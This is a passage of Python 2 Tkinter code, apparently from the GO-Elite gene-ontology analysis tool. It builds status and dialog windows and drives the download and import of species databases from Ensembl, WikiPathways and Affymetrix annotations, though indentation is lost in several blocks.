    def button2(self): self._user_variables['button']=self.button_text2; self._parent.destroy()
    def ButtonSelection(self): return self._user_variables
    def deleteWindow(self):
        # Window-manager close is disallowed; the user must pick a button.
        tkMessageBox.showwarning("Quit Selected","Use 'Quit' button to end program!",parent=self._parent)
class ProcessCompletedWindow:
    """Modal Tk window announcing that a process finished, with the program
    icon, a 'Quit' button (exits) and a custom-labelled close button."""
    def __init__(self,message,button_text):
        self.message = message; self.button_text = button_text
        parent = Tk(); self._parent = parent; nulls = '\t\t\t\t\t\t\t'; parent.title('Process Completed')
        filename = 'Config/icon.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
        can = Canvas(parent); can.pack(side='left',padx = 10); can.config(width=img.width(), height=img.height())
        can.create_image(2, 2, image=img, anchor=NW)
        Label(parent, text='\n'+self.message+'\n'+nulls).pack()
        quit_button = Button(parent, text='Quit', command=self.quit); quit_button.pack(side = 'bottom', padx = 5, pady = 5)
        text_button = Button(parent, text=self.button_text, command=parent.destroy); text_button.pack(side = 'bottom', padx = 5, pady = 5)
        parent.mainloop()
    def quit(self): self._parent.quit(); self._parent.destroy(); sys.exit()
class WarningWindow:
    """Blocking warning dialog: thin wrapper around tkMessageBox.showwarning."""
    def __init__(self,warning,window_name):
        tkMessageBox.showwarning(window_name, warning)
class InfoWindow:
    """Blocking info dialog: thin wrapper around tkMessageBox.showinfo."""
    def __init__(self,dialogue,header):
        tkMessageBox.showinfo(header, dialogue)
class StringVarFile:
    """File-like adapter that redirects writes (e.g. sys.stdout) into a Tk
    StringVar so printed output appears in a GUI label, refreshing the
    window after each write."""
    def __init__(self,stringVar,window):
        self.__newline = 0; self.__stringvar = stringVar; self.__window = window
    def write(self,s):
        # Append the incoming characters to the current StringVar contents.
        # Note: '\k' below is a two-character literal that never equals a
        # single char, so the newline flag stays off - deliberate, see comment.
        new = self.__stringvar.get()
        for c in s:
            #if c == '\n': self.__newline = 1
            if c == '\k': self.__newline = 1### This should not be found and thus results in a continous feed rather than replacing a single line
            else:
                if self.__newline: new = ""; self.__newline = 0
                new = new+c
            try: self.set(new)
            except Exception: None ### Not sure why this occurs
    def set(self,s): self.__stringvar.set(s); self.__window.update()
    def get(self): return self.__stringvar.get()
class StatusWindow:
def __init__(self,root,analysis,values):
try:
if debug_mode == 'yes':
if analysis == 'getAdditionalOnlineResources':
species_code,additional_resources = values
getAdditionalOnlineResources(species_code,additional_resources,root)
if analysis == 'EntrezGOExport':
tax_id,species_code,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG = values
exportEntrezGO(tax_id,species_code,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG,root)
if analysis == 'AffyCSV':
system_codes,species_code,species_full,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version = values
extractAffymetrixCSVAnnotations(system_codes,species_code,species_full,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version.root)
if analysis == 'UpdateOBO':
file_location_defaults,update_OBO,OBO_url = values
updateOBOfiles(file_location_defaults,update_OBO,OBO_url,root)
if analysis == 'getOnlineEliteConfig':
file_location_defaults = values
getOnlineEliteConfig(file_location_defaults,root)
if analysis == 'getOnlineEliteDatabase':
file_location_defaults,db_version,new_species_codes,download_obo,additional_resources = values
getOnlineEliteDatabase(file_location_defaults,db_version,new_species_codes,download_obo,additional_resources,root)
if analysis == 'DownloadEntrezGO':
file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG = values
downloadFiles(file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG,root)
if analysis == 'EnsemblSQLImport':
species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system = values
importEnsemblSQL(species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system,root)
if analysis == 'copy':
file1,file2 = values
copyFiles(file1,file2,root)
if analysis == 'updateRelationshipFiles':
update_relationship_file,relationship_to_update,overwrite_relationships,species_code = values
addNewCustomRelationships(update_relationship_file,relationship_to_update,overwrite_relationships,species_code,root)
if analysis == 'updateAnnotationFiles':
update_annotation_file,annotations_to_update,overwrite_annotations,species_code = values
addNewCustomAnnotations(update_annotation_file,annotations_to_update,overwrite_annotations,species_code,root)
if analysis == 'getCurrentEnsemblSpecies':
getCurrentEnsemblSpecies(root)
if analysis == 'getVersionedEnsExternalDB':
species_full,ensembl_version = values
getVersionedEnsExternalDB(species_full,ensembl_version,root)
else:
self._parent = root
root.title('GO-Elite 1.2.5 - Status Window')
statusVar = StringVar() ### Class method for Tkinter. Description: "Value holder for strings variables."
if os.name == 'nt': width = 575; height = 450
else: width = 650; height = 500
self.sf = PmwFreeze.ScrolledFrame(self._parent,
labelpos = 'n', label_text = 'Results Status Window',
usehullsize = 1, hull_width = width, hull_height = height)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Output')
group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
Label(group.interior(),width=180,height=452,justify=LEFT, bg='black', fg = 'white',anchor=NW,padx = 5,pady = 5, textvariable=statusVar).pack(fill=X,expand=Y)
status = StringVarFile(statusVar,root) ### Captures the stdout (or print) to the GUI instead of to the terminal
original_sys_out = sys.stdout ### Save the original stdout mechanism
sys.stdout = status
if analysis == 'getAdditionalOnlineResources':
species_code,additional_resources = values
root.after(100, getAdditionalOnlineResources(species_code,additional_resources,root))
if analysis == 'EntrezGOExport':
tax_id,species_code,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG = values
root.after(100, exportEntrezGO(tax_id,species_code,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG,root))
if analysis == 'AffyCSV':
system_codes,species_code,species_full,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version = values
root.after(100, extractAffymetrixCSVAnnotations(system_codes,species_code,species_full,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version,root))
if analysis == 'UpdateOBO':
file_location_defaults,update_OBO,OBO_url = values
root.after(100, updateOBOfiles(file_location_defaults,update_OBO,OBO_url,root))
if analysis == 'getOnlineEliteConfig':
file_location_defaults = values
root.after(100, getOnlineEliteConfig(file_location_defaults,root))
if analysis == 'getOnlineEliteDatabase':
file_location_defaults,db_version,new_species_codes,download_obo,additional_resources = values
root.after(100, getOnlineEliteDatabase(file_location_defaults,db_version,new_species_codes,download_obo,additional_resources,root))
if analysis == 'DownloadEntrezGO':
file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG = values
root.after(100, downloadFiles(file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG,root))
if analysis == 'EnsemblSQLImport':
species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system = values
importEnsemblSQL(species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system,root)
if analysis == 'copy':
file1,file2 = values
root.after(100,copyFiles(file1,file2,root))
if analysis == 'updateRelationshipFiles':
update_relationship_file,relationship_to_update,overwrite_relationships,species_code = values
root.after(100,addNewCustomRelationships(update_relationship_file,relationship_to_update,overwrite_relationships,species_code,root))
if analysis == 'updateAnnotationFiles':
update_annotation_file,annotations_to_update,overwrite_annotations,species_code = values
root.after(100,addNewCustomAnnotations(update_annotation_file,annotations_to_update,overwrite_annotations,species_code,root))
if analysis == 'getCurrentEnsemblSpecies':
root.after(100,getCurrentEnsemblSpecies(root))
if analysis == 'getVersionedEnsExternalDB':
species_full,ensembl_version = values
root.after(100,getVersionedEnsExternalDB(species_full,ensembl_version,root))
#self._parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
self._parent.mainloop()
sys.stdout = original_sys_out ### Set this back to not capture print statements to the GUI anymore (if you don't no printing to the terminal)
try: self._parent.destroy()
except Exception: null = []
except Exception,e:
try:
print traceback.format_exc()
print_out = "Unknown error encountered during data processing.\nIf this error occurs again, please report to genmapp@gladstone.ucsf.edu."
try: WarningWindow(print_out,'Error Encountered!'); self._parent.destroy()
except Exception: print print_out
except Exception: sys.exit()
def deleteWindow(self): tkMessageBox.showwarning("Quit Selected","Use 'Quit' button to end program!",parent=self._parent)
def quit(self): self._parent.quit(); self._parent.destroy(); sys.exit()
def addNewCustomRelationships(update_relationship_file,relationship_to_update,overwrite_relationships,species_code,root):
try: status = gene_associations.addNewCustomRelationships(update_relationship_file,relationship_to_update,overwrite_relationships,species_code)
except Exception, e: status = e
if status == 'exported':
print_out = "Imported relationships added to: "+relationship_to_update
InfoWindow(print_out,'Process Completed')
else:
print status
print_out = "Unknown file error encountered. Ensure the input file only has two columns."
WarningWindow(print_out,'Error Encountered!')
root.destroy()
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def addNewCustomAnnotations(update_annotation_file,annotations_to_update,overwrite_annotations,species_code,root):
try: status = gene_associations.addNewCustomSystem(update_annotation_file,annotations_to_update,overwrite_annotations,species_code)
except Exception, e: status = e; print e
if status == 'exported':
print_out = "Imported annotations added to "+species_code+' '+annotations_to_update
InfoWindow(print_out,'Process Completed')
else:
print status
print_out = "Unknown file error encountered. Ensure the input file only has three columns."
WarningWindow(print_out,'Error Encountered!')
root.destroy()
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def getCurrentEnsemblSpecies(root):
    """Query Ensembl (via EnsemblSQL) for the current species and version
    lists, store them in module globals, then close the status window. On
    failure, warn the user and restart the Create/Modify Databases menu."""
    global child_dirs; global ensembl_species; global ensembl_versions
    import EnsemblSQL
    try:
        print "Getting a list of current Ensembl species...one moment please"
        version = 'current'
        child_dirs, ensembl_species, ensembl_versions = EnsemblSQL.getCurrentEnsemblSpecies(version)
        ensembl_versions.reverse() # newest versions first
        root.destroy()
    except Exception:
        print_out = "A internet connection could not be established.\nPlease fix the problem before proceeding."
        WarningWindow(print_out,'Continue'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def filterExternalDBs(all_external_ids,externalDBName_list,external_ids,array_db):
    """Return the requested external database names whose ids are present in
    'all_external_ids' (GO excluded), followed by every array name in
    'array_db' that does not contain the SQL null marker '\\N_'."""
    kept = []
    for db_name in externalDBName_list:
        if db_name in external_ids and db_name != 'GO':
            if external_ids[db_name] in all_external_ids:
                kept.append(db_name)
    for array_name in array_db:
        if '\\N_' not in array_name:
            kept.append(array_name)
    return kept
def getVersionedEnsExternalDB(species_full,ensembl_version,root):
    """Download the external_db table (and, when available, the array table)
    for the requested species/Ensembl version into Config/. On any failure
    (network, missing file, or species unsupported in that version) warn the
    user and restart the Create/Modify Databases menu."""
    try:
        import EnsemblSQL
        print "Getting a list of current Ensembl external databases...one moment please"
        child_dirs, ensembl_species, ensembl_versions = EnsemblSQL.getCurrentEnsemblSpecies(ensembl_version)
        try:
            ensembl_sql_dir,ensembl_sql_description_dir = child_dirs[species_full]
            ### Download the latest version of Ensembl
            try:
                EnsemblSQL.updateFiles(ensembl_sql_dir,'Config/','external_db.txt','yes')
                # Array relationships live in the 'funcgen' schema, not 'core'
                try: EnsemblSQL.updateFiles(string.replace(ensembl_sql_dir,'core','funcgen'),'Config/','array.txt','yes')
                except Exception:
                    # No funcgen data: leave an empty array file in place
                    raw = export.ExportFile('Config/array.txt'); raw.close()
                    print "No array relationships avaiable for",species_full
                root.destroy()
            except Exception:
                print_out = "Ensembl external database file not found."
                WarningWindow(print_out,'Continue'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
        except Exception:
            ### species not supported by Ensembl version
            print_out = "This species is not available for this version of\nEnsembl. Please try another version.."
            WarningWindow(print_out,'Continue'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
    except Exception:
        print_out = "A internet connection could not be established.\nPlease fix the problem before proceeding."
        WarningWindow(print_out,'Continue'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def copyFiles(file1,file2,root):
print 'Copying file from:\n',file1
print 'To:\n',file2
data = export.ExportFile(file2) ### Ensures the directory exists
shutil.copyfile(file1,file2)
root.destroy()
def TimeStamp():
    """Return the current local date as a zero-padded YYYYMMDD string."""
    ### time.strftime performs the zero-padding the original did by hand
    return time.strftime('%Y%m%d')
def deleteWPFiles():
    """Empty the BuildDBs/wikipathways staging folder by deleting and
    recreating it."""
    export.deleteFolder('BuildDBs/wikipathways')
    os.mkdir(filepath('BuildDBs/wikipathways'))
def extractAffymetrixCSVAnnotations(system_codes,species_codees,species_fulls,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version,root):
    """Build Affymetrix CSV and/or Wikipathways annotation databases for each
    requested species, show a completion dialog, and restart the
    Create/Modify Databases menu. 'species_codees' and 'species_fulls' are
    parallel lists of species codes and full names."""
    run_parameter = "Create/Modify Databases"
    if 'over-write previous' in overwrite_affycsv: overwrite_affycsv = 'over-write previous' ### The config name is longer
    if parse_genesets == 'no':
        # Affymetrix-CSV-only path: parse annotations per species
        for species_code in species_codees:
            print incorporate_previous_associations
            BuildAffymetrixAssociations.buildAffymetrixCSVAnnotations(species_code,incorporate_previous_associations,process_go,'no',integrate_affy_associations,overwrite_affycsv)
        print_out = 'Finished parsing the latest Affymetrix CSV annotations.'
        InfoWindow(print_out,'Update Complete!')
        continue_to_next_win = Button(text = 'Continue', command = root.destroy)
        continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
        GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
    else:
        ### Coded a little weird, but allows the user to select mapped (Ensembl-inferred) versus non-mapped
        relationship_types = ['native','mapped']; ri=0
        if get_mapped_file_version == 'yes':
            relationship_types = ['mapped','mapped']
        ### Used when building a flat file from GPML zip file
        import gene_associations; all_species = 'no'
        try:
            gene_associations.convertAllGPML(species_codees,species_fulls) ### Downloads GPMLs and builds flat files
        except Exception:
            status = 'Unable to connect to http://www.wikipathways.org'
            try: WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
            except Exception: print status; sys.exit()
        for relationship_type in relationship_types:
            index=0; ri+=1
            for species_code in species_codees:
                species_full = species_fulls[index]
                counts = BuildAffymetrixAssociations.importWikipathways(system_codes,incorporate_previous_associations,process_go,species_full,species_code,integrate_affy_associations,relationship_type,overwrite_affycsv)
                index+=1
            # NOTE(review): this dialog/restart/sys.exit() sequence sits inside
            # the relationship_type loop, so it runs after the FIRST pass and
            # the statements below the loop appear unreachable - confirm intent.
            if counts == 0: print_out = 'No Affymetrix annotation files found, thus results based on existing meta file relationships.'; WarningWindow(print_out,'Update Incomplete!')
            else: print_out = 'Finished parsing the latest Wikipathways and Affymetrix annotations.'; InfoWindow(print_out,'Update Complete!')
            continue_to_next_win = Button(text = 'Continue', command = root.destroy)
            continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
            GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
        print_out = 'Finished extracting Affymetrix probeset-gene associations file.'
        InfoWindow(print_out,'Update Complete!')
        print 'Update Complete!'
        continue_to_next_win = Button(text = 'Continue', command = root.destroy)
        continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
        GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
class MainMenu:
    """Introductory GO-Elite window: displays the program logo with 'Begin
    Analysis' and 'About GO-Elite' buttons; closing the window exits the
    program."""
    def __init__(self):
        parent = Tk()
        self._parent = parent
        parent.title('GO-Elite: Introduction')
        self._user_variables={}
        filename = 'Config/logo.gif'
        fn=filepath(filename)
        img = PhotoImage(file=fn)
        can = Canvas(parent)
        can.pack(fill=BOTH)
        can.config(width=img.width(), height=img.height())
        can.create_image(2, 2, image=img, anchor=NW)
        """
        ### Create and pack a horizontal RadioSelect widget.
        def buttoncallback(tag,callback=self.callback):
            callback(tag)
        horiz = PmwFreeze.RadioSelect(parent,
                labelpos = 'w', command = buttoncallback,
                label_text = 'GO-Elite version 1.2.5 Main', frame_borderwidth = 2,
                frame_relief = 'ridge'
        ); horiz.pack(fill = 'x', padx = 10, pady = 10)
        for text in ['Continue']: horiz.add(text)
        """
        ### Add some buttons to the horizontal RadioSelect
        continue_to_next_win = Tkinter.Button(text = 'Begin Analysis', command = parent.destroy)
        continue_to_next_win.pack(side = 'bottom', padx = 5, pady = 5);
        info_win = Button(self._parent, text="About GO-Elite", command=self.info)
        info_win.pack(side = 'bottom', padx = 5, pady = 5)
        parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
        parent.mainloop()
    def info(self):
        # Pop the 'About' dialog with version, license and author information.
        about = 'GO-Elite version 1.2.5.\n'
        about+= 'GO-Elite is an open-source, freely available application covered under the\n'
        about+= 'Apache open-source license. Additional information can be found at:\n'
        about+= 'http://www.genmapp.org/go_elite\n'
        about+= '\nDeveloped by:\n\tNathan Salomonis\n\tBruce Conklin\nGladstone Institutes 2005-2012'
        tkMessageBox.showinfo("About GO-Elite",about,parent=self._parent)
    def deleteWindow(self):
        #tkMessageBox.showwarning("Quit Selected","Use 'Quit' button to end program!",parent=self._parent)
        self._parent.destroy(); sys.exit()
    def callback(self, tag):
        #print 'Button',[option], tag,'was pressed.'
        self._user_variables['continue'] = tag
def addOnlineSpeciesDatabases():
    """Fetch the online GO-Elite configuration, let the user choose species
    databases/resources to download, and install them via StatusWindow.

    Re-displays the selection window until at least one species (or the OBO
    download) is chosen, then writes the merged species list back out with
    exportSpeciesInfo.
    """
    ### Download the current online configuration before presenting choices
    root = Tk(); analysis = 'getOnlineEliteConfig'
    values = file_location_defaults
    StatusWindow(root,analysis,values)
    importSystemInfo(); exportSystemInfo() ### By re-importing we incorporate new source data from the downloaded file
    ### Remember species known before the refresh so new ones can be merged in at the end
    existing_species_codes = species_codes
    importSpeciesInfo()
    try: resource_list = importResourceList()
    except Exception: resource_list=['Failed']
    if len(species_codes) == 0:
        # NOTE(review): no 'global' statement in this function, so this
        # assignment rebinds only a function-local name — confirm whether the
        # module-level integrate_online_species flag is meant to change here.
        integrate_online_species = 'yes'
        importSpeciesInfo() ### Occurs when an unknown error erases the species file
    # Build a sorted species menu with a leading blank entry
    online_species = ['']
    for species in species_codes: online_species.append(species)
    online_species.sort()
    # Collect available database versions; newest (reverse-sorted first) is the default
    importOnlineDatabaseVersions(); db_version_list=[]
    for version in db_versions: db_version_list.append(version)
    db_version_list.sort(); db_version_list.reverse(); select_version = db_version_list[0]
    db_versions[select_version].sort()
    # Populate the three species pick-lists, the version list and the extra resources
    option_db['selected_species1'].setAnalysisOptions(['---']+db_versions[select_version])
    option_db['selected_species2'].setAnalysisOptions(['---']+db_versions[select_version])
    option_db['selected_species3'].setAnalysisOptions(['---']+db_versions[select_version])
    option_db['selected_version'].setAnalysisOptions(db_version_list)
    option_db['additional_resources'].setAnalysisOptions(['---']+resource_list)
    proceed = 'no'
    # Loop until the user makes a selection that allows a download to start
    while proceed == 'no':
        root = Tk(); root.title('GO-Elite: Species Databases Available for Download')
        gu = GUI(root,option_db,option_group_db['OnlineDatabases'])
        db_version = gu.Results()['selected_version']
        exportDBversion(db_version)
        # Each selection may be absent from the results dict; default to '---'
        try: species1 = gu.Results()['selected_species1']
        except Exception: species1='---'
        try: species2 = gu.Results()['selected_species2']
        except Exception: species2='---'
        try: species3 = gu.Results()['selected_species3']
        except Exception: species3='---'
        try: download_obo = gu.Results()['download_obo']
        except Exception: download_obo='---'
        additional_resources = gu.Results()['additional_resources']
        new_species_list = [species1,species2,species3]; new_species_codes={}
        for species in new_species_list:
            # substring test: skips both the '---' placeholder and '----' separators
            if '---' not in species:
                try:
                    sc = species_codes[species].SpeciesCode();
                    new_species_codes[sc]=[]
                    # carry the newly selected species into the merged export set
                    existing_species_codes[species] = species_codes[species]
                except Exception: null=[]
        if len(new_species_codes) > 0 or download_obo == 'yes':
            ### Download the selected databases (and/or the OBO files)
            root = Tk(); analysis = 'getOnlineEliteDatabase'
            values = file_location_defaults,db_version,new_species_codes,download_obo,additional_resources
            StatusWindow(root,analysis,values)
            proceed = 'yes'
        else:
            print_out = "Please select a species before continuing."
            IndicatorWindow(print_out,'Try Again')
    # Persist the union of previously installed and newly downloaded species
    exportSpeciesInfo(existing_species_codes)
    # NOTE(review): local rebinding only — see the note above on this flag
    integrate_online_species = 'no'
def getUserParameters(run_parameter):
global root; global GO_Elite
import GO_Elite
if run_parameter == 'intro':
try: MainMenu()
except Exception:
print_out = "\nCritical error encountered!!! This machine does not have either:\n"
print_out += "1) Have the required Tcl/Tk components installed.\n"
print_out += "2) Is being run from a compiled version that has critical incompatibilities your OS or hardware or\n"
print_out += "3) Is being run from source-code in the same-directory as executable code resulting in a conflict\n"
print_out += "\nIf any of these apply, we recommend downloading the Python source-code version of GO-Elite "
print_out += "(installing necessary dependencies - see our Wiki or Documentation) or should be run from the web version of GO-Elite."
print_out += "Otherwise, please contact GO-Elite support (genmapp@gladstone.ucsf.edu).\n\n"
print_out += "Installation Wiki: http://code.google.com/p/go-elite/wiki/Installation\n\n"
print print_out
try:
### Create a log report of this
try: log_file = filepath('GO-Elite_error-report.log')
except Exception: log_file = filepath('/GO-Elite_error-report.log')
log_report = open(log_file,'w');
log_report.write(print_out)
log_report.write(traceback.format_exc())
log_report.close()
### Open this file
if os.name == 'nt':
try: os.startfile('"'+log_file+'"')
except Exception: os.system('open "'+log_file+'"')
elif 'darwin' in sys.platform: os.system('open "'+log_file+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+log_file+'/"')
except Exception: None
sys.exit()
global species; species=''; global user_variables; user_variables={}; global analysis_method; global array_type
### Get default options for GO-Elite
global run_mappfinder; global ncbi_go_file; global PathDir; global remove_download_files; remove_download_files = 'no'
global system_list; system_list=[]; global system_codes; system_codes={}; global option_db; global option_group_db
global file_location_defaults; global integrate_online_species; integrate_online_species = 'no'; global PathFile
na = 'NA'; log = 'log'; no = 'no';
run_mappfinder=no; mod=na; permutation=0; modifyDBs=no; overwrite_affycsv = na; overwrite_entrezgo = na
incorporate_previous_associations=no; process_go=no; z_threshold=1.96; p_val_threshold=0.05; resources_to_analyze = ''
change_threshold=2; max_member_count = 10000; output_dir = ''; input_dir = ''; denom_dir = ''; custom_sets_dir = ''
ORA_algorithm = no; run_from_scratch = None; returnPathways = None
option_group_db,option_db = importUserOptions('options') ##Initially used to just get the info for species and array_type
import copy
importSpeciesInfo()
if len(species_codes) == 0:
integrate_online_species = 'yes'
importSpeciesInfo() ### Occurs when an unknown error erases the species file
file_location_defaults = importDefaultFileLocations()
ncbi_go_file = file_location_defaults['EntrezGO'].Location()
null,system_list,mod_list = importSystemInfo()
system_code_db = {}
for sysname in system_codes: ad = system_codes[sysname]; system_code_db[ad.SystemCode()]=sysname
species_code_db = {}
for species in species_codes: sd = species_codes[species]; species_code_db[sd.SpeciesCode()]=species
try: PathDir = file_location_defaults['PathDir'].Location()
except Exception: PathDir = ''
try: PathFile = file_location_defaults['PathFile'].Location()
except Exception: PathFile = ''
elite_db_versions=[]
try: elite_db_versions = returnDirectoriesNoReplace('/Databases')
except Exception:
try: elite_db_versions=[];
except Exception: null=[]### directory already exists
try: gene_database_dir = unique.getCurrentGeneDatabaseVersion()
except Exception: gene_database_dir=''
global gu
###Update this informatin in option_db which will be over-written after the user selects a species and array_type
current_species_names = getSpeciesList() ### returns a list of the installed species names (full)
species_list_augmented = copy.deepcopy(current_species_names)
species_list_augmented2 = copy.deepcopy(species_list)
option_db['species'].setAnalysisOptions(current_species_names)
option_db['mod'].setAnalysisOptions(mod_list)
resource_list = importResourceList()
species_list.sort()
if len(elite_db_versions)>1:
option_db['dbase_version'].setAnalysisOptions(elite_db_versions)
option_db['dbase_version'].setDefaultOption(gene_database_dir)
else:
### Otherwise, remove this option
del option_db['dbase_version']; option_group_db['ORA'] = option_group_db['ORA'][1:]
species_list_augmented.sort(); species_list_augmented2.sort()
if len(species_list_augmented2)>0 and species_list_augmented2 != ['']:
species_list_augmented.append('----'); species_list_augmented2.append('----'); species_list_augmented.append('New Species'); species_list_augmented.append('all-supported')
else: species_list_augmented=[]; species_list_augmented2=[]
if len(species_list_augmented)==0: species_list_augmented.append('New Species')
species_list_augmented2.append('New Species')
species_list_augmented.reverse()
option_db['species_resources'].setAnalysisOptions(current_species_names) #species_list_augmented2[:-2]
option_db['species_affy_update'].setAnalysisOptions(species_list_augmented)
option_db['species_eg_update'].setAnalysisOptions(species_list_augmented)
option_db['species_update'].setAnalysisOptions(species_list_augmented2)
if run_parameter[0] == 'ORA': ### Occurs when selecting "Back" from Elite parameter window
old_options = run_parameter[1]
run_mappfinder = 'yes'; run_parameter = 'ORA'
for option in old_options: ### Set options to user selected
option_db[option].setDefaultOption(old_options[option])
try:
if run_parameter == 'skip' or run_parameter == 'intro' or run_parameter == 'ORA':
if run_parameter!= 'ORA':
root = Tk()
root.title('GO-Elite: Main Dataset Parameters')
gu = GUI(root,option_db,option_group_db['parameters'])
run_from_scratch = gu.Results()['run_from_scratch']
if run_from_scratch == 'Analyze ID Lists': run_mappfinder = 'yes'; update_dbs = 'no'
if run_from_scratch == 'Prune Existing Results': run_mappfinder = 'no'; update_dbs = 'no'
if run_from_scratch == 'Update or Add Databases': run_mappfinder = 'no'; update_dbs= 'yes'
if run_from_scratch == 'View Data on Pathways': run_mappfinder = 'NA'; update_dbs = 'NA'
if update_dbs == 'no':
if len(species_codes)==0 or gene_database_dir == '' or len(elite_db_versions)==0: ### No species stored
print_out = "No species databases found. Select\ncontinue to proceed with species download."
IndicatorWindow(print_out,'Continue')
integrate_online_species = 'yes'
addOnlineSpeciesDatabases()
GO_Elite.importGOEliteParameters(['ORA',{}]); sys.exit()
if run_mappfinder == 'yes':
proceed = 'no'; update_dbs = 'no'
while proceed == 'no':
root = Tk();
root.title('GO-Elite: Over-representation Analysis (ORA) Parameters')
gu = GUI(root,option_db,option_group_db['ORA'])
species = gu.Results()['species']
species_code = species_codes[species].SpeciesCode()
permutation = gu.Results()['permutation']
mod = gu.Results()['mod']
try: input_dir = gu.Results()['input_dir']
except KeyError: input_dir = ''
try: denom_dir = gu.Results()['denom_dir']
except KeyError: denom_dir = ''
try: custom_sets_dir = gu.Results()['custom_sets_dir']
except KeyError: custom_sets_dir = ''
try: ORA_algorithm = gu.Results()['ORA_algorithm']
except KeyError: ORA_algorithm = ''
for option in gu.Results(): ### Set options to user selected if error occurs
option_db[option].setDefaultOption(gu.Results()[option])
try:
geneGO_import_dir = '/Databases/'+species_code+'/gene-go'
gg = gene_associations.GrabFiles(); gg.setdirectory(geneGO_import_dir)
filedir,goname = gg.searchdirectory(mod)
except Exception: goname = ''
try:
geneMAPP_import_dir = '/Databases/'+species_code+'/gene-mapp'
gm = gene_associations.GrabFiles(); gm.setdirectory(geneMAPP_import_dir)
filedir,mappname = gm.searchdirectory(mod)
except Exception: mappname = ''
if goname=='' and mappname=='':
print_out = "The primary system (aka MOD) %s is currently unavailable for that species." % mod
IndicatorWindow(print_out,'Continue')
elif len(input_dir)>0 and len(denom_dir)>0:
try:
null = int(permutation)
proceed = 'yes'
except Exception:
print_out = "Invalid numerical permutation entry. Try again."
IndicatorWindow(print_out,'Continue')
input_text_files = readDirText(input_dir)
input_denom_files = readDirText(denom_dir)
if len(input_text_files)>0 and len(input_denom_files)>0: proceed = 'yes'
else:
proceed = 'no'
if len(input_text_files)==0:
print_out = 'No files with the extension ".txt" found in the input directory.'
IndicatorWindow(print_out,'Continue')
else:
print_out = 'No files with the extension ".txt" found in the denominator directory.'
IndicatorWindow(print_out,'Continue')
else:
print_out = "Please designate an input and denominator file directory"
IndicatorWindow(print_out,'Continue')
else:
update_dbs = 'yes' ### Happens when a previous option was selected (or warning) that re-runs this interface to get a specific menu
modifyDBs = run_parameter
if run_from_scratch == 'View Data on Pathways':
root = Tk()
root.title('GO-Elite: Visualize Data on WikiPathways')
gu = GUI(root,'ViewWikiPathways',[])
if update_dbs == 'yes':
if run_parameter == 'skip' or run_parameter == 'intro':
###Update this informatin in option_db which will be over-written after the user selects a species and array_type
root = Tk()
root.title('GO-Elite: Update Options')
#print option_list[i:i+1];kill
gu = GUI(root,option_db,option_group_db['update'])
modifyDBs = gu.Results()['modifyDBs1']
if modifyDBs == 'Create/Modify Databases':
root = Tk(); root.title('GO-Elite: Create/Modify/Update Databases')
gu = GUI(root,option_db,option_group_db['update2'])
modifyDBs = gu.Results()['modifyDBs2']
if modifyDBs == 'Your Own Text Files':
species = '---'
while '--' in species:
root = Tk(); root.title('GO-Elite: Manually Add New Relationships')
gu = GUI(root,option_db,option_group_db['customOptions'])
species = gu.Results()['species_update']
if species == 'New Species':
new_run_parameter = modifyDBs
modifyDBs = 'Add New Species Support'
update_options = ''
else:
species_code = species_codes[species].SpeciesCode()
update_options = gu.Results()['update_options']
current_species_dirs = unique.read_directory('/Databases')
if species_code not in current_species_dirs:
print_out = "Support for this species not downloaded yet. Select\ncontinue to proceed with species download."
IndicatorWindow(print_out,'Continue')
integrate_online_species = 'yes'
addOnlineSpeciesDatabases()
GO_Elite.importGOEliteParameters(['modifyDBs2',{}]); sys.exit()
if update_options == 'Add New Gene System':
new_system_name= ''; new_system_code = ''
while new_system_name == '' or new_system_code =='':
root = Tk(); root.title('GO-Elite: Add New Gene System')
gu = GUI(root,option_db,option_group_db['addCustomSystem'])
new_system_name = gu.Results()['new_system_name']
new_system_code = gu.Results()['new_system_code']
new_mod = gu.Results()['new_mod']
try: gene_system_file = gu.Results()['gene_system_file']
